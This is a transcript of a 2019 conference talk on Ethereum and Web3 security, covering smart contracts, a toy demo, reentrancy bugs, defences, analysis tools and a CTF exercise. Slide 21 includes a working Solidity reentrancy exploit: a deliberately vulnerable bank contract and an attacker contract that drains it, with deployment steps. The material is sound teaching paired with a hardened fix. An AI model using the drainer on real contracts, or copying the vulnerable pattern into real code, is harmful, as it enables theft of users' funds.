1 of 33

Close Encounters of the Third Web

Dean Pierce

ISACA June 2019

2 of 33

Who let this guy in the building?

  • Gave my first DEF CON talk in 2005
  • pdx.edu infosec 2005-2007
  • Weird crypto stuff 2007-2010
  • Intel Open Source Technology Center security 2010-2016
  • Intel Red Team 2016-2018
  • ConsenSys Diligence 2018-present

3 of 33

In the news

  • Google announces partnership with ChainLink
  • Facebook announces new cryptocurrency "Libra".
  • Cloudflare announces launch of new Ethereum gateways.

4 of 33

Where are we at?

  • Who has heard of Bitcoin?
  • Who has ever owned any bitcoin?
  • Who has heard of Ethereum?
  • Who has made transactions on the Ethereum network?
  • Who has developed Ethereum applications?

5 of 33

BLOCKCHAIN!

6 of 33

What is Web3?

7 of 33

What is Web3?

Web3 is a new model for building web applications where data and business logic are stored in a globally distributed ledger rather than on any particular server.

8 of 33

What's all this then?

  • Magic sky computer.
  • Ethereum is everywhere, anyone can run a node, nodes have the data.
  • Mainnet is a thing, also testnets: Kovan, Rinkeby, Ropsten...
  • Can push "contracts" onto the network.
  • Anyone can execute functions on the contracts (subject to whatever checks the contract itself does).
  • Reading any data is free (a view call answered by any node), but writing is a transaction that costs gas, typically a few cents.
  • The blockchain becomes the backend.
  • Authorities have been unsuccessful in arresting smart contracts.

9 of 33

A Stupid Example

10 of 33

A Stupid Example

11 of 33

A Stupid Example

12 of 33

A Stupid Example

13 of 33

A Stupid Example

14 of 33

A Stupid Example

  • Download MetaMask
    • set it all up
    • switch to the "Ropsten" network
  • Go to kik.to/stupidcode to get source code for contract.
  • Check out deployed contract at kik.to/stupidcontract.
  • Load the contract code into remix.ethereum.org.
  • Run > At Address > 0xc3302466aa628804607820bc8c40dd791c4b6d0c
  • Add a stupid thing to the list of other stupid things!
  • MANDATORY FUN TIME!
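
The talk's contract source lives behind kik.to/stupidcode and is not reproduced on this page. As an added example of my own (not the talk's code), here is a contract in the same spirit: a list of strings anyone can append to, with the write path costing gas and the read path free. The names StupidThings, addThing, count and getThing are my own choices; the syntax is Solidity 0.5, contemporary with the talk.

```solidity
pragma solidity ^0.5.0;

// Hypothetical "stupid list" contract: anyone can append, anyone can read.
contract StupidThings {
    string[] private things;

    // Logged on every write so a front end can watch for new entries.
    event ThingAdded(address indexed who, uint256 index, string thing);

    // WRITE: a transaction. The caller (msg.sender) pays gas for the storage write.
    function addThing(string memory thing) public {
        uint256 len = bytes(thing).length;
        require(len > 0 && len <= 140, "bad length"); // keep storage costs bounded
        things.push(thing);
        emit ThingAdded(msg.sender, things.length - 1, thing);
    }

    // READ: a view function, served by any node via eth_call, no transaction, no gas paid.
    function count() public view returns (uint256) {
        return things.length;
    }

    function getThing(uint256 i) public view returns (string memory) {
        require(i < things.length, "no such thing");
        return things[i];
    }
}
```

In Remix, deploying this to Ropsten and calling addThing prompts MetaMask for a signed transaction; count and getThing return immediately with no prompt, which is the free-read / paid-write split from the previous slides.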

15 of 33

A Stupid Example

  • But why is this so future?
  • Could this actually be something useful?
  • I hate paying for servers!

16 of 33

A Stupid Example

HTTP://STUPID.SITE

OMG JAVASCRIPT

17 of 33

18 of 33

19 of 33

20 of 33

21 of 33

What about hacking?

  • A very common bug for looting is "Reentrancy".
  • Contracts can send ETH to each other and to normal (externally owned) addresses.
  • From inside a contract, a normal address and a contract address are hard to tell apart: extcodesize is 0 for an externally owned account, but also for a contract that is still running its constructor.
  • Sending ETH to a contract executes its "fallback function".

If you can get a contract to send ETH to an address you choose, you can make that address a malicious contract whose "fallback function" calls back into the vulnerable contract before it has finished updating its state, and does nasty things (for example, withdraws again while its recorded balance is still non-zero).

"Stop hitting yourself"
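
As an added example (my own code, not the contract shown in the talk's Remix demo), here is the classic shape of the bug and the attacker contract that loots it. VulnerableBank, Attacker and their function names are assumptions; the syntax is Solidity 0.5.

```solidity
pragma solidity ^0.5.0;

// Vulnerable: the ETH is sent BEFORE the balance is zeroed, and call() forwards
// all remaining gas, so the recipient's fallback can re-enter withdraw().
contract VulnerableBank {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw() external {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");
        (bool ok, ) = msg.sender.call.value(amount)(""); // interaction first (bug)
        require(ok, "send failed");
        balances[msg.sender] = 0;                        // effect happens too late
    }
}

// Attacker: its fallback re-enters withdraw() while balances[attacker] is still non-zero.
contract Attacker {
    VulnerableBank public target;
    address payable public owner;

    constructor(address payable _target) public {
        target = VulnerableBank(_target);
        owner = msg.sender;
    }

    // Seed a small balance, then trigger the first withdraw.
    function attack() external payable {
        require(msg.value > 0, "need a seed deposit");
        target.deposit.value(msg.value)();
        target.withdraw();
    }

    // Fallback: each payout re-enters as long as the bank can pay one more round.
    // The nested calls unwind only after the bank is empty; every level then sets
    // balances[attacker] = 0 and returns ok, so nothing reverts.
    function() external payable {
        if (address(target).balance >= msg.value) {
            target.withdraw();
        }
    }

    function drain() external {
        require(msg.sender == owner, "not owner");
        owner.transfer(address(this).balance);
    }
}
```

Deploy VulnerableBank, fund it from a second account, deploy Attacker with the bank's address, and call attack() with a little ETH: the bank's whole balance ends up in Attacker, which is the "stop hitting yourself" loop from the slide.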

22 of 33

WTF Remix?

23 of 33

Yay Reentrancy!

24 of 33

Yay Reentrancy!

25 of 33

Malicious Smart Contracts

26 of 33

Malicious Smart Contracts

27 of 33

Pure Pwnage

28 of 33

Defense against the Dark Arts

  • send() and transfer() forward only a fixed 2300-gas stipend, which in theory is enough to log the payment but not enough to write storage or call back into the sender, so a fallback function can't re-enter through them.
  • The SpankChain hack (Oct 9, 2018) got reentrancy anyway: the payment-channel contract called transfer() on a user-supplied ERC20 token contract (an arbitrary function call, not an ETH send()), and that contract re-entered before state was updated. The protections aren't perfect!
  • Lots of contracts still use call (which forwards all remaining gas), or directly execute functions on contract addresses passed in by the user, whose code you can make do whatever you want.
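
As an added example (my own code, not from the talk), here is the hardened counterpart: checks-effects-interactions ordering plus a reentrancy mutex, applied both to an ETH withdrawal that still uses call() and to a call into a user-supplied token contract, the route the slide above describes. SafeBank, nonReentrant, depositToken and withdrawToken are my own names; the IERC20 interface is the standard ERC20 subset needed here; syntax is Solidity 0.5.

```solidity
pragma solidity ^0.5.0;

// Just the ERC20 surface used below (standard signatures).
interface IERC20 {
    function transfer(address to, uint256 amount) external returns (bool);
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

contract SafeBank {
    mapping(address => uint256) public balances;                          // ETH per user
    mapping(address => mapping(address => uint256)) public tokenBalances; // token => user => amount
    bool private locked;

    // Mutex: a second entry into any guarded function reverts, no matter how much gas
    // the caller has, so the guard does not depend on send()/transfer()'s stipend.
    modifier nonReentrant() {
        require(!locked, "reentrant call");
        locked = true;
        _;
        locked = false;
    }

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    // Pull payment in checks-effects-interactions order: the balance is zeroed BEFORE
    // the external call. call() still forwards all gas, so the ordering and the guard
    // are what protect us, not a gas limit.
    function withdraw() external nonReentrant {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");          // check
        balances[msg.sender] = 0;                            // effect
        (bool ok, ) = msg.sender.call.value(amount)("");     // interaction
        require(ok, "send failed");
    }

    // `token` is whatever address the user passes in: calling it runs the user's code.
    // The 2300-gas stipend only applies to send()/transfer() of ETH, never to a call like
    // this, so the same two defences are needed here.
    function depositToken(IERC20 token, uint256 amount) external nonReentrant {
        require(token.transferFrom(msg.sender, address(this), amount), "transferFrom failed");
        tokenBalances[address(token)][msg.sender] += amount;
    }

    function withdrawToken(IERC20 token) external nonReentrant {
        uint256 amount = tokenBalances[address(token)][msg.sender];
        require(amount > 0, "nothing to withdraw");
        tokenBalances[address(token)][msg.sender] = 0;                 // effect first
        require(token.transfer(msg.sender, amount), "transfer failed"); // interaction last
    }
}
```

Run the Attacker contract from the reentrancy example against this bank and its re-entrant withdraw() hits "reentrant call"; even without the mutex, the zeroed balance makes the second withdraw revert with "nothing to withdraw", and the whole attack unwinds. A later caveat not in the talk: the 2300-gas stipend assumes opcode prices never change, and EIP-1884 in the Istanbul fork (December 2019) raised the cost of SLOAD enough to break fallback functions that had just fit inside it, which is one more reason to rely on the ordering and the guard rather than on transfer()'s gas limit.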

29 of 33

Hacking is hard, what about tools?

pip3 install mythril

myth -x target.sol   (newer Mythril releases: myth analyze target.sol)

pip3 install manticore

manticore --detect-all target.sol

pip3 install slither-analyzer

slither target.sol

30 of 33

Fuzzing

31 of 33

Honeypot Contracts

32 of 33

Frontrunning

33 of 33

Learn you a haxing!

For the next couple of hours, we will be playing with

https://capturetheether.com

Sweet prizes for the first people to reach 500 points!